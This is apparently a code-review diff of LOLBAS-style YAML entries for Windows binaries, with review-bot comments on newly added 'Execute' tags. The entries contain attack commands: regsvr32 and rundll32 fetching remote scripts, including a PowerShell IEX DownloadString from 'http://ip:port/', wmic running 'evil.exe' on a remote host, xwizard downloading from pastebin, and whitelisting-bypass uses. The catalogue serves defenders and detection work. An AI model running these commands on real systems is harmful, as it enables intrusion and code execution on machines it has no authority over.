- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Description: Loads the target .Net DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
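Review bot: the two entries in this hunk are identical in Command (`regsvcs.exe AllTheThingsx64.dll`), Description, Usecase and now Tags; they differ only in Category (Execute vs AWL Bypass) and Privileges (User vs Local Admin). If the split is intentional, the Description or Usecase should say what changes with admin rights; otherwise fold them into one entry while these lines are being touched.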

View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
@@ -18,6 +21,8 @@ Commands:
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
@@ -25,6 +30,9 @@ Commands:
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
@@ -32,6 +40,8 @@ Commands:
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
Full_Path:
- Path: C:\Windows\System32\regsvr32.exe
- Path: C:\Windows\SysWOW64\regsvr32.exe

View File

@@ -22,13 +22,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Execute: Remote
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
Usecase: Proxy execution
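Review bot: by the counts (-22,13 +22,7) seven lines go away and one comes in, so the `javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell ... DownloadString ...")` entry is deleted outright, and the added `- Execute: Remote` now attaches to the entry preceding the `eval("w=new%20ActiveXObject(...);w.run(\"calc\")...")` command. A tag-adding commit should not silently drop a technique; if it was judged a duplicate of the other RunHTMLApplication variants, state that in the message, and confirm Remote is meant for the entry it now sits under, since the only remote-fetching command in this hunk is the one being removed.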
@@ -36,13 +30,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
Usecase: Execute code from Internet
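Review bot: same pattern as the previous hunk (-36,13 +30,8): the `run("calc.exe",0,true) ... taskkill /f /im rundll32.exe` entry is removed while `- Execute: JScript` is added to the eval/calc entry. Two deleted entries in one file is a content change, not a tagging change, and should be described in the commit message.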
@@ -50,6 +39,8 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
Usecase: Execute code from alternate data stream
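Review bot: the `- Execute: JScript` added here sits under the entry whose command is `GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")`, which fetches its script from a remote URL, but no `- Execute: Remote` accompanies it, unlike the remote-URL entries in the Cmstp, Regsvr32 and msiexec hunks of this same commit. Add Remote here for consistency.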
@@ -67,7 +58,7 @@ Commands:
MitreID: T1218.011
OperatingSystem: Windows 10 (and likely previous versions), Windows 11
Tags:
- Execute: DLL
- Execute: COM
Full_Path:
- Path: C:\Windows\System32\rundll32.exe
- Path: C:\Windows\SysWOW64\rundll32.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\runexehelper.exe
Detection:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\runonce.exe
- Path: C:\Windows\SysWOW64\runonce.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: PowerShell
Full_Path:
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
Description: Modifies an existing service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\sc.exe
- Path: C:\Windows\SysWOW64\sc.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation
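Review bot: Typo in the Usecase context line, `relative to the the time of creation` should read `relative to the time of creation`; it is outside the added lines but trivial to fold into this commit.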
@@ -18,6 +20,8 @@ Commands:
Privileges: Administrator
MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe
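Review bot: This Tags block precedes Full_Path, so it tags the last command in the file, the `schtasks /create /s targetmachine /tn "MyTask" ...` entry shown in the previous hunk, which creates the task on a remote host. Other entries in this commit that act on a remote target carry `- Execute: Remote` next to the main tag (scriptrunner with the `\\fileserver` path, wmic with `/node:`), so add `- Execute: Remote` here as well for consistency.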

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmd from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
@@ -18,6 +20,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: Remote
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\scriptrunner.exe
- Path: C:\Windows\SysWOW64\scriptrunner.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\setres.exe
Detection:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: EXE
- Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\SettingSyncHost.exe
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10 1809, Windows Server 2019
Tags:
- Execute: CMD
- Command: ssh -o ProxyCommand=calc.exe .
Description: Executes calc.exe from ssh.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
Full_Path:
- Path: c:\windows\system32\OpenSSH\ssh.exe
Detection:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10
Tags:
- Execute: EXE
- Command: stordiag.exe
Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.
Usecase: Possible defence evasion purposes.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\stordiag.exe
- Path: c:\windows\syswow64\stordiag.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
Tags:
- Execute: PowerShell
Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1127
OperatingSystem: Windows 10 2004 and above, Windows 11
Tags:
- Execute: EXE
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary
@@ -18,6 +20,8 @@ Commands:
Privileges: Administrator
MitreID: T1127
OperatingSystem: Windows 10 1909 and below
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\ttdinject.exe
- Path: C:\Windows\Syswow64\ttdinject.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1127
OperatingSystem: Windows 10 1809 and newer, Windows 11
Tags:
- Execute: EXE
- Command: TTTracer.exe -dumpFull -attach pid
Description: Dumps process using tttracer.exe. Requires administrator privileges
Usecase: Dump process by PID
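Review bot: Only the first TTTracer command receives a Tags block; the `TTTracer.exe -dumpFull -attach pid` entry in the trailing context is left without one. That is defensible, since a process dump is not an Execute action, but if the schema or tooling now expects a Tags key on every command this item needs one with a value other than Execute; otherwise say in the commit message that non-execution entries are intentionally left untagged.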

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\unregmp2.exe
- Path: C:\Windows\SysWOW64\unregmp2.exe

View File

@@ -11,8 +11,6 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
@@ -20,8 +18,6 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe
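Review bot: Both hunks for vbc (-11,8 +11,6 and -20,8 +18,6) are removals: the `Tags:` key and its `- Execute: WSH` entry are dropped from both commands and nothing is added in their place. Dropping WSH is correct, `vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb` compiles VB.NET source rather than running a Windows Script Host script, but the commit message only speaks of adding tags; mention the removal there, and decide whether vbc should get a replacement value or is meant to stay without Tags.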

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.012
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: COM
Full_Path:
- Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Program Files\Windows Mail\wab.exe
- Path: C:\Program Files (x86)\Windows Mail\wab.exe

View File

@@ -11,6 +11,9 @@ Commands:
Privileges: Local Administrator - required to enable local manifest setting
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: Remote
- Execute: EXE
- Command: winget.exe install --accept-package-agreements -s msstore [name or ID]
Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.'
Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\wlrmdr.exe
Code_Sample:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: wmic.exe process call create calc
Description: Execute calc from wmic
Usecase: Execute binary from wmic to evade defensive counter measures
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Description: Execute evil.exe on the remote system.
Usecase: Execute binary on a remote system
@@ -25,6 +29,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: Remote
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Create a volume shadow copy of NTDS.dit that can be copied.
Usecase: Execute binary on remote system
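Review bot: The Description in the trailing context, `Create a volume shadow copy of NTDS.dit that can be copied.`, does not match the command above it, `wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"`, which fetches and applies a remote XSL stylesheet; the Usecase line `Execute binary on remote system` is the intended meaning. The mismatch is pre-existing, but since the next hunk tags that command `XSL` and `Remote`, fix the Description in the same commit so the tags and the text agree.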
@@ -32,6 +39,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: XSL
- Execute: Remote
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
Usecase: Execute script from remote system
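Review bot: Typo in the Description context line, `stylsheet` should be `stylesheet`. The `- Execute: XSL` plus `- Execute: Remote` pair added here is right for the URL-hosted stylesheet command shown in the previous hunk's context.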
@@ -40,7 +50,8 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Execute: XSL
- Execute: Remote
- Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe"
Description: Copy file from source to destination.
Usecase: Copy file.

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\WorkFolders.exe
Detection:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: COM
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
Usecase: Run a com object created in registry to evade defensive counter measures
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: COM
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
Usecase: Download file from Internet

View File

@@ -27,6 +27,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml
Acknowledgement:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Low privileges
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
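Review bot: This Tags block belongs to the command item preceding `msedgewebview2.exe --utility-cmd-prefix="calc.exe"` and gives it `- Execute: EXE`, while the three following hunks give `- Execute: CMD` to commands whose Description is word for word the same (`...will spawn calc.exe as its subprocess`). Unless the first command differs in kind, the four entries should share one value; state which of EXE and CMD is meant for a proxied process launch and apply it to all four.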
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
@@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
@@ -32,6 +38,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
Detection:

View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
Detection: